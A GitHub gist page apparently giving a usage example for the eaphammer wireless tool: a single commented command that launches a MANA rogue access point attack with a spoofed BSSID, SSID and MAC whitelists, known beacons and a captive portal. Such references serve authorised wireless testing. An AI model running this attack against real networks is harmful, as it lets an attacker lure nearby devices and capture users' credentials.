Skip to content

Instantly share code, notes, and snippets.

@s0lst1c3
Created November 4, 2019 06:19
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save s0lst1c3/165185bbe07a1d7f8c89aaf4ea7fd67b to your computer and use it in GitHub Desktop.
Save s0lst1c3/165185bbe07a1d7f8c89aaf4ea7fd67b to your computer and use it in GitHub Desktop.
# execute a mana attack but only respond to ESSIDs in whitelist
./eaphammer -i wlan0 \
--bssid de:ad:be:ef:13:37 \
--mana \
-e bananas \
--ssid-whitelist ssid-whitelist.txt \
--mac-whitelist mac-whitelist.txt \
--known-beacons \
--captive-portal
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment